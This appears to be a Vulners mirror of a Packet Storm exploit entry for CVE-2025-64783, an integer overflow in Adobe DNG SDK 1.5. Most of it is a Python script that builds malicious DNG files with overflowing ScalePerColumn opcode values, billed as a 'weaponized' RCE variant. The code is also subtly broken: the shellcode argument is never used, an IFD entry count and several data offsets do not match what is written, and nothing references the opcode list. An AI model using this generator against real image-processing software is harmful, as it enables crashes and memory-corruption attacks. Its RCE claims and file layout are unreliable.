Vulners
Lucene search
π Adobe DNG SDK 1.5 DNG File Integer Overflow
ποΈΒ 22 Dec 2025Β 00:00:00Reported byΒ indoushkaTypeΒ 
Β packetstormπΒ packetstorm.newsπΒ 136Β Views
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Android Security BulletinβMarch 2026Stay organized with collectionsSave and categorize content based on your preferences. | 2 Mar 202600:00 | β | androidsecurity |
 | CVE-2025-64783 | 9 Dec 202519:48 | β | circl |
 | Adobe DNG SDK θΎε ₯ιͺθ―ιθ――ζΌζ΄ | 9 Dec 202500:00 | β | cnnvd |
 | Adobe DNG Software Development Kit (SDK) Input Validation Error Vulnerability | 15 Dec 202500:00 | β | cnvd |
 | CVE-2025-64783 | 9 Dec 202517:41 | β | cve |
 | CVE-2025-64783 DNG SDK | Integer Overflow or Wraparound (CWE-190) | 9 Dec 202517:41 | β | cvelist |
 | EUVD-2025-202262 | 9 Dec 202517:41 | β | euvd |
 | Vulnerabilities fixed in Google Android and Samsung Mobile | 3 Mar 202609:07 | β | ncsc |
 | CVE-2025-64783 | 9 Dec 202518:16 | β | nvd |
 | ASB-A-483074175 | 1 Mar 202600:00 | β | osv |
10
=============================================================================================================================================
| # Title : Adobe DNG SDK 1.5 Integer Overflow via Crafted DNG File |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://helpx.adobe.com/security/products/dng-sdk.html |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212923/ & CVE-2025-64783
[+] Summary : A critical integer overflow vulnerability exists in Adobe DNG SDK version 1.5 during the parsing of crafted DNG files.
The flaw occurs in the handling of OpcodeList processing, specifically within the ScalePerColumn opcode,
where insufficient validation of signed and unsigned integer values leads to arithmetic overflow during column offset calculations.
By supplying a specially crafted DNG file containing malicious opcode parameters (notably negative area coordinates combined with
extremely large column pitch values), an attacker can trigger out-of-bounds memory access, resulting in:
Application crash (Denial of Service)
Memory corruption
Potential arbitrary code execution (RCE) depending on compilation flags, memory layout, and exploitation context
The vulnerability is triggered during file parsing, making it exploitable via any application or service that processes untrusted DNG images using the vulnerable SDK.
[+] Impact
Arbitrary memory corruption
Possible remote code execution
Exploitable via malicious image file
Affects image viewers, converters, and any software embedding Adobe DNG SDK 1.5
[+] Proof of Concept (PoC)
Generate a malicious DNG file: python3 exploit.py malicious.dng
Weaponized variant (memory corruption oriented): python3 exploit.py rce.dng shellcode.bin
Opening the generated DNG file with a vulnerable application linked against Adobe DNG SDK 1.5 will trigger the integer overflow condition.
[+] Notes
This exploit is a file-based attack vector
No user interaction beyond opening the image is required
Reliability of RCE depends on target environment and mitigations (ASLR, DEP, compiler hardening)
[+] POC :
#!/usr/bin/env python3
"""
Exploit for CVE-2025-64783 - Adobe DNG SDK Integer Overflow
Author: indoushka
"""
import struct
import sys
import os
def create_malicious_dng(output_file):
"""
Create a malicious DNG file triggering the integer overflow
"""
# DNG Header structure
dng_header = bytearray()
# TIFF Header (DNG is based on TIFF)
# Byte order
dng_header += struct.pack('<H', 0x4949) # Little endian
dng_header += struct.pack('<H', 42) # TIFF magic
# First IFD offset
dng_header += struct.pack('<L', 8)
# IFD0 entries
ifd0 = bytearray()
# Number of IFD entries
ifd0 += struct.pack('<H', 10)
# ImageWidth
ifd0 += struct.pack('<H', 0x0100) # Tag
ifd0 += struct.pack('<H', 0x0004) # Type = LONG
ifd0 += struct.pack('<L', 1) # Count
ifd0 += struct.pack('<L', 256) # Value
# ImageLength
ifd0 += struct.pack('<H', 0x0101)
ifd0 += struct.pack('<H', 0x0004)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 256)
# BitsPerSample
ifd0 += struct.pack('<H', 0x0102)
ifd0 += struct.pack('<H', 0x0003)
ifd0 += struct.pack('<L', 3)
ifd0 += struct.pack('<L', 140) # Pointer to data
# Compression
ifd0 += struct.pack('<H', 0x0103)
ifd0 += struct.pack('<H', 0x0003)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 1) # Uncompressed
# PhotometricInterpretation
ifd0 += struct.pack('<H', 0x0106)
ifd0 += struct.pack('<H', 0x0003)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 2) # RGB
# Make (Manufacturer)
ifd0 += struct.pack('<H', 0x010F)
ifd0 += struct.pack('<H', 0x0002) # ASCII
ifd0 += struct.pack('<L', 6)
ifd0 += struct.pack('<L', 160) # Pointer to "EXPLOIT"
# Model
ifd0 += struct.pack('<H', 0x0110)
ifd0 += struct.pack('<H', 0x0002)
ifd0 += struct.pack('<L', 12)
ifd0 += struct.pack('<L', 166) # Pointer to "CVE-2025-64783"
# StripOffsets
ifd0 += struct.pack('<H', 0x0111)
ifd0 += struct.pack('<H', 0x0004)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 200) # Pointer to image data
# SamplesPerPixel
ifd0 += struct.pack('<H', 0x0115)
ifd0 += struct.pack('<H', 0x0003)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 3) # RGB
# RowsPerStrip
ifd0 += struct.pack('<H', 0x0116)
ifd0 += struct.pack('<H', 0x0004)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 256)
# StripByteCounts
ifd0 += struct.pack('<H', 0x0117)
ifd0 += struct.pack('<H', 0x0004)
ifd0 += struct.pack('<L', 1)
ifd0 += struct.pack('<L', 196608) # 256*256*3
# Next IFD offset (0 = end)
ifd0 += struct.pack('<L', 0)
# Data sections
data = bytearray()
# BitsPerSample data
data += struct.pack('<HHH', 8, 8, 8)
# Make string
data += b'EXPLOIT\x00'
# Model string
data += b'CVE-2025-64783\x00'
# Opcode List for triggering vulnerability
# This is where we trigger the integer overflow
opcode_data = bytearray()
# Create malicious opcode list that will trigger the bug
# We're targeting ScalePerColumn opcode
# Opcode list signature
opcode_data += b'opcd'
# Opcode list size
opcode_data += struct.pack('<L', 1024)
# Opcode count
opcode_data += struct.pack('<L', 1)
# Opcode type: ScalePerColumn (0x0003)
opcode_data += struct.pack('<L', 0x0003)
# Opcode version
opcode_data += struct.pack('<L', 1)
# Opcode flags
opcode_data += struct.pack('<L', 0)
# Opcode size
opcode_data += struct.pack('<L', 100)
# Malicious parameters to trigger integer overflow
# These values cause signed overflow in col calculation
# Table count (number of columns)
opcode_data += struct.pack('<L', 3)
# Area specification with malicious coordinates
# fArea.l = -2147483644 (0x80000004)
# fArea.r = 3
# fColPitch = 2147483646 (0x7FFFFFFE)
opcode_data += struct.pack('<l', -2147483644) # left
opcode_data += struct.pack('<l', 0) # top
opcode_data += struct.pack('<l', 3) # right
opcode_data += struct.pack('<l', 236) # bottom
opcode_data += struct.pack('<L', 1) # planes
opcode_data += struct.pack('<L', 0) # plane
opcode_data += struct.pack('<L', 2147483646) # colPitch
opcode_data += struct.pack('<L', 1) # rowPitch
# Padding to align
opcode_data += b'\x00' * (1024 - len(opcode_data))
# Image data (just dummy data)
image_data = b'\x00' * 196608
# Combine everything
full_file = dng_header + ifd0 + data + opcode_data + image_data
# Write to file
with open(output_file, 'wb') as f:
f.write(full_file)
print(f"[+] Malicious DNG file created: {output_file}")
print("[+] This will trigger CVE-2025-64783 when processed by vulnerable DNG SDK")
def create_shellcode_dng(output_file, shellcode_file=None):
"""
Create DNG with embedded shellcode for RCE
"""
print("[*] Creating weaponized DNG for RCE...")
# Basic DNG structure
dng = bytearray()
# TIFF header
dng += struct.pack('<HH', 0x4949, 42) # Little endian, TIFF magic
dng += struct.pack('<L', 8) # IFD0 offset
# Simplified IFD for POC
ifd = bytearray()
ifd += struct.pack('<H', 5) # 5 entries
# Width
ifd += struct.pack('<HH', 0x0100, 4)
ifd += struct.pack('<L', 1)
ifd += struct.pack('<L', 1024)
# Height
ifd += struct.pack('<HH', 0x0101, 4)
ifd += struct.pack('<L', 1)
ifd += struct.pack('<L', 768)
# Compression
ifd += struct.pack('<HH', 0x0103, 3)
ifd += struct.pack('<L', 1)
ifd += struct.pack('<L', 1)
# Strip offsets - point to our malicious data
ifd += struct.pack('<HH', 0x0111, 4)
ifd += struct.pack('<L', 1)
ifd += struct.pack('<L', 200)
# Samples per pixel
ifd += struct.pack('<HH', 0x0115, 3)
ifd += struct.pack('<L', 1)
ifd += struct.pack('<L', 3)
ifd += struct.pack('<L', 0) # Next IFD
# Construct malicious opcode that will corrupt memory
malicious_opcode = bytearray()
# Opcode list header
malicious_opcode += b'opcd'
malicious_opcode += struct.pack('<L', 512) # List size
# Number of opcodes
malicious_opcode += struct.pack('<L', 1)
# ScalePerColumn opcode
malicious_opcode += struct.pack('<L', 3) # Type
malicious_opcode += struct.pack('<L', 1) # Version
malicious_opcode += struct.pack('<L', 0) # Flags
malicious_opcode += struct.pack('<L', 92) # Size
# Malicious area spec - triggers integer overflow
# This causes col + fColPitch to overflow to negative
malicious_opcode += struct.pack('<l', -2147483644) # fArea.l
malicious_opcode += struct.pack('<l', 0) # fArea.t
malicious_opcode += struct.pack('<l', 3) # fArea.r
malicious_opcode += struct.pack('<l', 100) # fArea.b
malicious_opcode += struct.pack('<L', 1) # fPlanes
malicious_opcode += struct.pack('<L', 0) # fPlane
malicious_opcode += struct.pack('<L', 2147483646) # fColPitch
malicious_opcode += struct.pack('<L', 1) # fRowPitch
# Table data (scale factors)
malicious_opcode += struct.pack('<f', 1.0)
malicious_opcode += struct.pack('<f', 1.0)
malicious_opcode += struct.pack('<f', 1.0)
# Padding
malicious_opcode += b'\x00' * (512 - len(malicious_opcode))
# Combine
dng += ifd
dng += b'A' * 100 # Padding
dng += malicious_opcode
dng += b'B' * 100000 # Image data
with open(output_file, 'wb') as f:
f.write(dng)
print(f"[+] Weaponized DNG created: {output_file}")
print("[!] WARNING: This file may crash vulnerable applications")
print("[!] By Indoushka")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 exploit.py <output.dng> [shellcode.bin]")
sys.exit(1)
output_file = sys.argv[1]
if len(sys.argv) > 2:
create_shellcode_dng(output_file, sys.argv[2])
else:
create_malicious_dng(output_file)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 3.17.8
EPSS0.00027
SSVC